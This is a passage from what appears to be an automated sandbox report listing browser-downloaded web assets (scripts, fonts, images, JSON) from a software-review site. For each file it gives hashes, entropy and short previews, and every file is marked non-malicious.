                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):107348
                                                                                                                                                                                                        Entropy (8bit):5.264039514215191
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:ReqhZjvnk1z3vrsja9cxEf6+6Glby/XJ42qbVTE4wLyPe9VAs:R1hZjKJ1y/Z4rbrwLPVAs
                                                                                                                                                                                                        MD5:114785899CEB423273FCC17AAAD202E9
                                                                                                                                                                                                        SHA1:CE53389286218FE6D7CE1EB86208074C024ACCA5
                                                                                                                                                                                                        SHA-256:C8C302716CF94980A0D77E614D9FB6C430F166B5EF7C42B7C382771955E52BA6
                                                                                                                                                                                                        SHA-512:6E357A327420598542BFFEDF8F03F7F4C327469CDC6CC52B39C0B542DA4EF09C6739F46161C8D2796BFA05193D94B47420308CF4F2A50A2F0DF73EE9712544A4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[50],{"7nmT":function(e,t,n){"use strict";!function checkDCE(){if("undefined"!==typeof __REACT_DEVTOOLS_GLOBAL_HOOK__&&"function"===typeof __REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE)try{__REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE(checkDCE)}catch(e){console.error(e)}}(),e.exports=n("w/UT")},"w/UT":function(n,r,a){"use strict";var i=a("ERkP"),o=a("maj8"),u=a("jiMj");function x(e){for(var t=arguments.length-1,n="https://reactjs.org/docs/error-decoder.html?invariant="+e,r=0;r<t;r++)n+="&args[]="+encodeURIComponent(arguments[r+1]);!function ba(e,t,n,r,l,a,i,o){if(!e){if(e=void 0,void 0===t)e=Error("Minified exception occurred; use the non-minified dev environment for the full error message and additional helpful warnings.");else{var u=[n,r,l,a,i,o],c=0;(e=Error(t.replace(/%s/g,function(){return u[c++]}))).name="Invariant Violation"}throw e.framesToPop=1,e}}(!1,"Minified React error #"+e+"; visit %s for the full message or use the non-minified dev
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, baseline, precision 8, 500x373, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):18724
                                                                                                                                                                                                        Entropy (8bit):7.955192345242199
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:DDmBjV40yQKVGoooooMzfFAUWgs580uCXYxCAPSDjP3cVTx55tS7U:XmBJNoooooMrxWgG8VyYxCiSfuTx07U
                                                                                                                                                                                                        MD5:CC176DBDA3EE2F075BD94C5EC03B12BA
                                                                                                                                                                                                        SHA1:6114E92D32D94C3AA789EF967446BBD35599F45D
                                                                                                                                                                                                        SHA-256:0BA224E5A912D13BD87793A5E5A11AB652878AE0D6C4D352E0FBB3F35344A697
                                                                                                                                                                                                        SHA-512:E56DE2F4705A98267A08DDE076206704D3D6EE09AAF8FB811D3A7B14284C7D32452497A06B2C12594CA6B92499261CBD0249EC428DCFEEBC523AF5C2F80E4519
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......u....".........................................S...........................!1Q..ARaq.."23Sr......#TUc....Bbs...$46Ct.%D...5Ed..................................3........................!1..Q."ARa..2...q.#3B................?......D@...DD....D@...DD....D@...DD....D@...DD....D@...DD..BC`..f'....R..>...SI..j..%.G....5{..8.\k.I<....vQ.d...!.;.n.F..#...X..yA.eFw.K.g.{..*2..;......F..v... ..._/....|.*.G.p-....:..{V.....H..b.R...X..7^....h..k1....:......:.9%x......[.uR.....;.{.......0....9Y;L.y..... ...7 ....jG\D!.8l.Q/B?x.'(....{..v3.....=.....{...@j9E.....EQC<.5.......j.......8.../.p...;+g....}...?.L....T...f...#..K.<.....yz...Ex......G....q.......8...v.snuz.....%U..|.f...zk4.e.MeS1..i.]..4.#...,.(....{.;.L>...].R..../^..q.>Q/A...U..J.`A..<..{..C..>eu8........" ..."".......(.....A...~]..c^......c.!.I8.q...P...}...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5515
                                                                                                                                                                                                        Entropy (8bit):7.357022227264376
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7j35N26MT0D5MdtbZPAVwzVJG3hZtpqyzSKcGJ93sb:+7DoYNMtKwXG3hZX6Kfcb
                                                                                                                                                                                                        MD5:192AB59926336A3C1BCF705D8B567884
                                                                                                                                                                                                        SHA1:C7ADABB0F21C98217A56E06163DB355EFD47AE41
                                                                                                                                                                                                        SHA-256:CAB5A13423591FC82F8B97CDA0DBF0F5148A7DD3DC8DB393257CC0CC19AA15BF
                                                                                                                                                                                                        SHA-512:2AA8361DF50045AE50B5BC84DBF004E453E4CF28F7F12E27BDCD2E1F32460F18749BB320EE54CD45526B36F840974BB56FA1B2A57506E7B03396BCC158DA1D20
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/8d54c31f-ffb8-435c-9795-73330c5d470c.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............W...4.............M...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11987), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11987
                                                                                                                                                                                                        Entropy (8bit):5.256756846275912
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:BT5RzC7YdVCtkFRKCrBcCp6bbPHCfzICp1CApUwvCK/AvoBQtCYn4zMCpZmT3jZL:oKVCNCACzCAN7/koWtCcCIj5
                                                                                                                                                                                                        MD5:C71E6869F6177E1A8F3F1BAE94F3F1B8
                                                                                                                                                                                                        SHA1:234686A7B9DA10634AC2FC6CE40BBD9EDB8639A0
                                                                                                                                                                                                        SHA-256:1348C446652C07696CA6C19383A2DDC534091E5DE8FD251E726CFA0FA4CDC234
                                                                                                                                                                                                        SHA-512:61B7D5A791AC5A46B69805369B91CF28A3E483D6E7B3A3506CE655A434E11224BDD6ACE90831475A6A27E8FEF7F522736041572A4E5AA60DE48C1F926A138738
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[630],{65313:function(e,t,r){"use strict";r.d(t,{Z:function(){return p}});var n=r(2784),o=r(2550),l=r(16734),i=r(25632),a=r(85194),c=r(1993);function u(e){return(u="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}var s=["className","children","color","gapless"];function f(){return(f=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}function d(e,t,r){var n;return(n=function(e,t){if("object"!==u(e)||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!==u(n))return n;throw TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(t,"string"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), CFF, length 63400, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):63400
                                                                                                                                                                                                        Entropy (8bit):7.995237409481236
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:1536:W7OVSBwCT8123fGaqF4fmR3K0NGXIrl/6ZoQgDm64Tq5eoK:W7z9T81zaqFe+K1XGliWQgbtK
                                                                                                                                                                                                        MD5:9293D6557565246F30DF049719412321
                                                                                                                                                                                                        SHA1:F0B2FF7C144BDA5FB0E2DACFA02D7D7A67C23D29
                                                                                                                                                                                                        SHA-256:A05CC6BE8342836EB500A5F0B95A0D572C494C3B8A01E708D904CAB4005777B5
                                                                                                                                                                                                        SHA-512:6BB8B4DE060187F1D07A38B08C957CDD05A0CCF332CE58E70033E66246D126C7069DE0F201A3AAF6BD3403A3243DF8965F340CC53B80F562B8F0BC1B59AE649A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n4&v=3
                                                                                                                                                                                                        Preview:wOF2OTTO...............H.........................F....?DYNA.p?GDYN.m...<..Z.`..,.6.$......... [....0....@...YH..a....PUUUUS....m....~.....W.........._..?........?L.v\..ph....H...n.......O....;..?.V..H"..:3`G...m.......bG./>...u8.:....c7.a.:V...65. .$......M..."....AZ.v'.O:...!....x...r..y.\./k.m.n4.T.1.V.....i6P.-..0..`C.c.Z.."b..1e........!.....t...k..."..Y..B@@....cq<..{..wy&...p....`o(X..4...".....a.(`.E.......6.v.1.Kb.).....x...?..u.d..{.(..DA,..kC...K.$.....o.[.Y..o.8T.P.AG|O~Y..L.M.&....r...H.......x..,.t.%....8.J..Q..%..c........$.t..T..T..C....bbR.5..u>.<N.uS.?[.M.t_* g. ...x../Y.l...X.{_R.....o*v.UO=..A..*...}&HSx.6.&Af.B..S..Y..B....*.}..._...H%\L9.m..c..=P...?{I... Z...`..T_K]..7.'.5.. .^g.}'...4...*..S....l5.i....{m.].....y...2km'....eVh.....+.s:...U.1...A9.%Pw.([..J..K.EU..U-..>@..Ww...Q..c,..s.!?.........Fp#y...<.nL...!.)T..K...SN.^./J...!..E...M.P9.q_...*.2w;f.G.Z$M...4,j...d..0S3.#............(,..YR....-.B...|..[o....[oXB...%.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7207)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7208
                                                                                                                                                                                                        Entropy (8bit):5.164123343165375
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:HA1SI+LtL9xW+XUB1SAfQu+BzaNPQznTjdNs6L:g1SIaxWLym+TD3
                                                                                                                                                                                                        MD5:F046BFA3E2CD2807E16D96CF04BDD930
                                                                                                                                                                                                        SHA1:E1FFB6FC6599857968CE3A361A2040FBB541F4EC
                                                                                                                                                                                                        SHA-256:8E6B3272816C9B6EFEB0B3CCC16326C123D9860F38D7C7C4FC215334559996E2
                                                                                                                                                                                                        SHA-512:C9718C6FE21E0D4D0AF31C393466A467478E9CF6DF4BDCCE2AD52F4CE4C00CEECF0296239A0FB65E128047035A02CDB684763038132A106D53167B5D1B2CAB62
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:var webVitals=function(e){"use strict";var n,t,r,i,o,a=-1,c=function(e){addEventListener("pageshow",(function(n){n.persisted&&(a=n.timeStamp,e(n))}),!0)},u=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},s=function(){var e=u();return e&&e.activationStart||0},f=function(e,n){var t=u(),r="navigate";a>=0?r="back-forward-cache":t&&(document.prerendering||s()>0?r="prerender":document.wasDiscarded?r="restore":t.type&&(r=t.type.replace(/_/g,"-")));return{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},d=function(e,n,t){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){n(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},t||{})),r}}catch(e
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (18020)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):272868
                                                                                                                                                                                                        Entropy (8bit):5.551630329697665
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:YBX21YbrjYdB6s9EMYwV0mHrJ5Cz+joJW373jXlEZtNAJ0+q/tc6:K21SAdB6siMHFlEZtNAJ0+q/
                                                                                                                                                                                                        MD5:8E3897D4C37408210D9437676CEA6767
                                                                                                                                                                                                        SHA1:CE7C77D4CC1C159018F263534079691A2DFFB871
                                                                                                                                                                                                        SHA-256:28B41B3109E0E2F5034818440B843CEB9800C4E1056BBFF2DFFACFBEA1E0B3A3
                                                                                                                                                                                                        SHA-512:AF21B634C9DDFF727720F27294CA97EF0F4EB13993204BD90511D8B33A28AB323CD62924DF013093E6BE4923395EA961987BF11D0A92AA17F66BE9182D68F170
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"40",. . "macros":[{"function":"__e"},{"function":"__e"},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__v","vtp_name":"gtm.elementClasses","vtp_dataLayerVersion":1},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-52597090-1","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__aev","vtp_varType":"TEXT"},{"function":"__v","vtp_name":"gtm.elementId","vtp_dataLayerVersion":1},{"function":"__u","vtp_component":"PATH","vtp_enableMulti
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34447)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):35585
                                                                                                                                                                                                        Entropy (8bit):5.227858835404307
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:C1NpkslDFLmy+/XFsyIPd3w1jr21pKJCngCZyzI5hul6OY9g4+7mZ9kvnTLvPfUz:aLk6q/2yCB5LW/HsESrp
                                                                                                                                                                                                        MD5:37633505B47EDA9DA0BD471C2816B38B
                                                                                                                                                                                                        SHA1:19E95D883A11781146EF46E70339F21726AE9121
                                                                                                                                                                                                        SHA-256:1A65C9631279409053461333989AC0E7BDCC7D1E2832EA889E746628DB99E0F6
                                                                                                                                                                                                        SHA-512:40904E3526E5D5A400C56E22930350A3141A14D4707EF4B23F6C0C16CE9F0BABD92EAB4F59D96C59BD4AC882B1122BF94740037B6818F2F1B1411BD89C164983
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:!function(){"use strict";var t=function(){function t(){}return t.prototype.trackAnonymousCustomer=function(){},t.prototype.getAnonymousId=function(){return null},t}(),e=function(t,r){return(e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])})(t,r)};./*! *****************************************************************************. Copyright (c) Microsoft Corporation... Permission to use, copy, modify, and/or distribute this software for any. purpose with or without fee is hereby granted... THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH. REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY. AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,. INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM. LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (32008)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):47680
                                                                                                                                                                                                        Entropy (8bit):5.315198888695839
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:P/BcPdPbl1rli9zNfDFNyozxLY+ww7iyNIiDzA41DIpwMIdUOTYRYRdiAR8aa4kH:PJ+DhsM+Aim6YSkVy3asztYFPAT27
                                                                                                                                                                                                        MD5:7E1862F7A390ED9FC02C299216395547
                                                                                                                                                                                                        SHA1:9BE3F87C9849CBDD8DABABCCEBE77FE5C6B30702
                                                                                                                                                                                                        SHA-256:DD2D8D288526B88B0EAE53168E31B4092ACF39ED38D40FFCBC6D0AB2F7A4AA66
                                                                                                                                                                                                        SHA-512:45EBA74A86E4CB778C406A5CC2CA56283D156D06B59CFD9ACA7221A9DC4BD1CFEBB740D6955CA054A88AFFACF4318F709ED39B0CC4A27978FB780E18D34DC0C0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:!function(t,n,e){function r(e,o){if(!n[e]){if(!t[e]){var a="function"==typeof __nr_require&&__nr_require;if(!o&&a)return a(e,!0);if(i)return i(e,!0);throw new Error("Cannot find module '"+e+"'")}var s=n[e]={exports:{}};t[e][0].call(s.exports,function(n){var i=t[e][1][n];return r(i||n)},s,s.exports)}return n[e].exports}for(var i="function"==typeof __nr_require&&__nr_require,o=0;o<e.length;o++)r(e[o]);return r}({1:[function(t,n,e){var r=t(42);n.exports=function(t,n){return"addEventListener"in window?window.addEventListener(t,n,r(!1)):"attachEvent"in window?window.attachEvent("on"+t,n):void 0}},{}],2:[function(t,n,e){function r(t,n,e,r){var i=d(t,n,e);return i.stats=a(r,i.stats),i}function i(t,n,e,r,i){var a=d(t,n,e,i);return a.metrics=o(r,a.metrics),a}function o(t,n){return n||(n={count:0}),n.count+=1,v(t,function(t,e){n[t]=a(e,n[t])}),n}function a(t,n){return null==t?s(n):n?(n.c||(n=f(n.t)),n.c+=1,n.t+=t,n.sos+=t*t,t>n.max&&(n.max=t),t<n.min&&(n.min=t),n):{t:t}}function s(t){return t?t.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 32x32, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):782
                                                                                                                                                                                                        Entropy (8bit):6.770571969424645
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:tLpLjEFLjEm9vpQLHKtuhaAob8r0viCN6+Z6cnpLZAP/4a2xKlck1p4PEn:TYzv6LHsuE8rXCN56cnlZAXRump4PEn
                                                                                                                                                                                                        MD5:CD9EC2D3E839331B83469733CEFCF528
                                                                                                                                                                                                        SHA1:AB6C33A9FA1B4C6F4FB119C73B32DEED18D0BA8F
                                                                                                                                                                                                        SHA-256:9959CBC1ACDA302ACC0494AFD8357994449900B6FC557E99C2D59008CA1408ED
                                                                                                                                                                                                        SHA-512:D759539DD1490A2B25FF24180BD5B0D41841DB63779A7E3F1EC9D411E206FDCD77F3D9C4B346C0F9D4951DC48ACB0CFBF791D56A350D4EBA7998DC281DD262BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF.....H.H........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\...... . .."..........-..........................................................7..1D.N.I.,\hq_I....C...&..........................!1.."Q..2A........?..S...k..|.....m..W.Ty%...+..9V...`.n>.n._\.[f....4."0..~.....r<....v..u.+.m.^\R.~!....J}...'.}\EKv.G.......n.n.1.VT$..u...w1.,f....%.1S#~B.............v.U1..m...."E..>E..{.......2.U.r..'..[E..%U..r....U.J.|...... .........................!1AQa........?...r1..).a*ke.}.....5....N.DVB....pb..=.]fNS.4..-.....b.9..OV^g.\X ..........!.........................!.Q."A........?..a....y/.P..uf.-..'\......./+T...b1Q..U..L.H" ...j.En..Q..[N...L,.c4q>.....^......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):42
                                                                                                                                                                                                        Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                        MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                        SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                        SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                        SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4062
                                                                                                                                                                                                        Entropy (8bit):4.939675058013374
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:QVVKd0k8SD+/0J3Pb7J2uvL10E28Di118l84:gVKd0k8s+/0dPfJ2410EBi118l84
                                                                                                                                                                                                        MD5:0FD0AB8978487E37A3D52936BA858B69
                                                                                                                                                                                                        SHA1:941603FEDABFDC9A9BE532FC5C26E3182EF685E1
                                                                                                                                                                                                        SHA-256:0C7804B0B85F4FC4C464F6F9583D742D1A751E2B524C6674B480D5EA171E8D63
                                                                                                                                                                                                        SHA-512:2576824D1EA2C79322C9E96E57149A53FED81696BD1EC383DD350A7FFD05299976BA621EA1B2BDF2521BEBF4F59B3B8AB39D5B3385A0F9AC6B3D65DB019FD4F9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/more_clients.svg
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>8</title>. <defs>. <path d="M10.0731707,0 L107.926829,0 C113.490088,0 118,4.50991215 118,10.0731707 L118,107.926829 C118,113.490088 113.490088,118 107.926829,118 L10.0731707,118 C4.50991215,118 0,113.490088 0,107.926829 L0,10.0731707 C0,4.50991215 4.50991215,0 10.0731707,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" i
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):23352
                                                                                                                                                                                                        Entropy (8bit):5.126933898925797
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:KMXPXXW3zXFWagTV8lljsV/TeWrtfCux2WqlJWidaQcmmGveU54xumc1Xwpb47cL:x/MzVJIylZsVreYtCI21fNdaQcRGveik
                                                                                                                                                                                                        MD5:5AA8274FCB2D8CD623B3F93447282893
                                                                                                                                                                                                        SHA1:62434F1FA4D99A092E253F2C075876A8FEA7631A
                                                                                                                                                                                                        SHA-256:C4C771FF26BD4F3D0CADFDF0781507CFADD8921C521D51391399CFAA4A952B7B
                                                                                                                                                                                                        SHA-512:F46C84AC8E6DCAE6098B621ADFF0BEDB933EA59C216517B5851E18038F60BBDE1B9FD036206F008640EB610424F95D85E5C2D84BC4FA1DBB74F2E901BF9463ED
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/api/v1/products/mix?lang=en&limit=48&page=0&sortBy=popularity&withFillers=true
                                                                                                                                                                                                        Preview:{"products":[{"_id":"885b2837-e739-4034-bcbf-a6d200b49f49","countOfOpenNeeds":2,"countOfPublishedReviews":20348,"logoUrl":"https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/90cac4f1-9eba-4d30-9949-91da634d4da5.png","name":"QuickBooks Enterprise","published":{"Capterra":true,"GetApp":true,"SoftwareAdvice":true},"vendorName":"Intuit","supportedLanguages":{"zu":false,"en":true,"fr":true,"es":true,"it":true,"zh":true}},{"_id":"8c7f8bf5-dbf6-47ee-9df7-a6d200b64092","countOfOpenNeeds":2,"countOfPublishedReviews":18489,"logoUrl":"https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/f11ea590-5812-4ce0-a108-3837d065513d.png","name":"Salesforce Sales Cloud","published":{"Capterra":true,"GetApp":true,"SoftwareAdvice":true},"vendorName":"Salesforce","supportedLanguages":{"zu":false,"fr":true,"ru":true,"sv":true,"it":true,"de":true,"en":true,"es":true}},{"_id":"55deb199-2462-4df1-997d-a78a00b635e4","countOfOpenNeeds":2,"countOfPublishedReviews":15643,"logoUrl":"https://gdm-catalog-fmapi-prod.img
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):532
                                                                                                                                                                                                        Entropy (8bit):6.03153548627527
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:+cK/gj6qWPaFBzC6lBCfaL2w5YPdX3KWZz77+XKV+mSND:+cKYj6LqzOf2KPNZzX+XS+xND
                                                                                                                                                                                                        MD5:83F9A07A43F075645B72689A45686635
                                                                                                                                                                                                        SHA1:DD23EDA18B24CC9833BAA739BFE8686E582CF9F7
                                                                                                                                                                                                        SHA-256:D948E2761DD6E5B888873E3DCD3598985474783915E52B33AEF9775E8AEAD49B
                                                                                                                                                                                                        SHA-512:D03B0417487F183F825367FD4582BE391D02E13D7053F33EA6C92B77EFC57112CA4A61527CE3597C65B637239382080D9748829ED4D2AA58568CA9472475C6C5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/229dd3ed-048e-42a1-96c3-68cd64c6a705.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe....... ... ....pixi............av1C........colrnclx...........ipma...................mdat......?...h4 2......0.....V...........47......N.zP)\.0.".,.(tO;Ku-/0....+..GA..xu.....f................_7.1J.A,Ac..J$.......ZX..g3.E..X,@.|[PX.f'8..[I..N;..|....h.......r..N.2..!.psr..mX.!..../..G...^#..- ...C.$]b.f...4....B5K...@!.0../..=..4
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2203
                                                                                                                                                                                                        Entropy (8bit):7.722661864405936
                                                                                                                                                                                                        Encrypted:false
